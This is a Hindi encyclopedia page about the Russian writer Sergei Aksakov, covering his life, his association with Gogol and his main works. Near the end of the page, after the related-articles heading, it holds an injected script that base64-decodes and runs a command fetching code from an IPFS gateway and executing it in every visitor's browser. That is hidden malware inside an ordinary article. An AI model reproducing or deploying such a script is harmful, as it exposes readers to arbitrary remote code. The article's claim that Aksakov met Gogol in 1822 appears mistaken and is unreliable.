अक्सकोव

भारत डिस्कवरी प्रस्तुति
Revision as of 12:29, 19 May 2018 by यशी चौधरी (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

अक्सकोव, सर्जी तिमोफियेविच सुप्रसिद्ध रूसी उपन्यासकार और संस्मरणकार। अक्सकोव का जन्म ऊफा (ओरेन्बर्ग) में 20 सितंबर, 1791 को हुआ था और प्रारंभ से ही उसे प्राकृतिक दृश्यों के प्रति सहज आकर्षण था। वह कज़ान विश्वविद्यालय का स्नातक था। साहित्य के क्षेत्र में उसे गोगोल से अधिक सहायता मिली जिसके विषय में उसने संस्मरण लिखे हैं। अक्सकोव के कुछ वर्ष यूराल के चरागाहों (स्टेपीज़) में भी बीते थे जहाँ दस वर्ष तक उसने कृषि कार्य अपना रखा था, किंतु उस क्षेत्र में उसे सफलता न मिली और आगे चलकर वह मास्को चला आया जहाँ गोगोल से मिलकर (1822 ई.) उसने एक साहित्यिक संस्था का संगठन किया। अक्सकोव रूसी जीवन का अभिचित्रण करने में बड़ा सफल हुआ है। उसके विषय में एक लेखक ने यहाँ तक लिखा है कि टॉलस्टाय के युद्ध और शांति (वार ऐंड पीस) में जिस तरह का सुंदर चित्रण पाया जाता है उससे किसी प्रकार कम सफलता अक्सकोव को उसकी रचनाओं में नहीं मिली है। अक्सकोव की कुछ प्रसिद्ध रचनाएँ हैं- क्रानिकिल्स ऑव ए रशियन फेमिली (1856, एम.सी. बेवर्ली का अंग्रेजी रूपांतर); रिकलेक्शंस ऑव गोगोल।[1]



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. हिन्दी विश्वकोश, खण्ड 1 |प्रकाशक: नागरी प्रचारिणी सभा, वाराणसी |संकलन: भारत डिस्कवरी पुस्तकालय |

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः